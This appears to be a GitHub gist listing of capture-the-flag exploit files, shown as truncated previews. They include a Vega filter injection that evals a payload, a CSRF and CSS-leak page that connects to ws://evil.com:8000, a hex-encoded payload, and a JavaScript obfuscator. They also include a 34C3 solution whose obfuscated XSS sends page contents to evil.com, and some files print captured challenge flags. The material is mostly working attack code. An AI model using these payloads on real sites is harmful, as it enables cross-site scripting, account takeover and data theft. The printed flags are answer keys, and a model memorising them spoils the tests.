View spectre.js
| const PAGE_SZ = 4096; | |
| const CACHE_LINE_SZ = 64; | |
| const CACHE_LINES_PER_PAGE = PAGE_SZ/CACHE_LINE_SZ; | |
| const CACHE_WAYS = 8; | |
| const MEM_PAGES = 8192; | |
| const WASM = false; | |
| class Utils { | |
| sort(arr) { | |
| for (let i = 0; i < arr.length; i++) { |
View writeup.txt
| ### Pwn! | |
| ```vega | |
| { | |
| "data": { | |
| "values": [{}] | |
| }, | |
| "transform": [ | |
| {"filter": "(0//1/)-'\\\n,eval(payload.dataset.x))))//'"} | |
| ], | |
| "mark": "bar" |
View source.js
| const fs = require('fs'); | |
| const express = require('express'); | |
| const session = require('express-session') | |
| const cookieParser = require('cookie-parser'); | |
| const { URL } = require('url'); | |
| const uuidv4 = require('uuid/v4'); | |
| const path = require('path'); | |
| const bot = require('./bot'); | |
| const crypto = require('crypto'); | |
| const mariadb = require('mariadb'); |
cgvwzq
/ js-lower-alpha-parent-dot.html
Last active May 24, 2019
Generate JS into only lowercase alphabet letters, parenthesis and dots.
View js-lower-alpha-parent-dot.html
| <style> | |
| textarea { | |
| width: 100%; | |
| height: 30%; | |
| } | |
| </style> | |
| <textarea id="input">alert('xss')</textarea> | |
| <textarea id="output"></textarea> | |
| <br> | |
| <label>Length: </label><span id="numchars"></span> |
View output.log
| [+] Server is listening on 5001 | |
| ...pre-payoad: | |
| ...post-payoad: | |
| ...pre-payoad: d | |
| ...post-payoad: 3 | |
| ...pre-payoad: d3 | |
| ...post-payoad: d3 | |
| ...pre-payoad: d3a | |
| ...post-payoad: 0d3 | |
| ...pre-payoad: d3ad |
View index.html
| <!doctype html> | |
| <meta charset=utf-8> | |
| <script> | |
| (function(){ | |
| let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544 |
View index.html
| <body> | |
| <form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST"> | |
| // change admin's email | |
| <input type="text" name="email" value="wololo@coolmail.com"> | |
| <input type="text" name="csrf" value=""> | |
| <input type="text" name="change" value="Modify profile"> | |
| </form> | |
| <iframe id="leakchar"></iframe> | |
| <script> | |
| const WS = "ws://evil.com:8000"; |
View solution.html
| XSS vector: | |
| <link id=foo rel=import href=/flag(1|2)> | |
| <script src="/feed?type=jsonp&cb=payload"></script> | |
| <!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u --> | |
| <script> | |
| document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`, | |
| </script> | |
| <!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru --> |